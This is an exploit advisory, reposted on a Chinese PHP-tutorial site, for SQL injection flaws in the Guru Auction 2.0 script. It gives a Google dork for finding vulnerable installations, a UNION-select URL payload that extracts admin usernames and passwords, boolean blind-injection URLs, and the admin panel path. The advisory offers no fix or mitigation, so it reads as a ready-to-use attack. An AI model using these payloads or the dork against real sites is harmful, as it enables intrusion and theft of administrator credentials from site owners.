来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] Guru Auction 2.0 Multiple SQL Injection Vulnerabilities作者 : v3n0m应用 : Guru Auction 2.0Price : $49Vendor : http://www.guruscript.com/Google Dork : inurl:subcat.......
|
Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
作者 : v3n0m
应用 : Guru Auction 2.0
Price : $49
Vendor : http://www.guruscript.com/
Google Dork : inurl:subcat.php?cate_id=
SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
盲注 p0c:
~~~~~~~~~~
http://www.2cto.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
管理登录入口:
~~~~~~~~~~
http://domain.tld/[path]/admin/
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
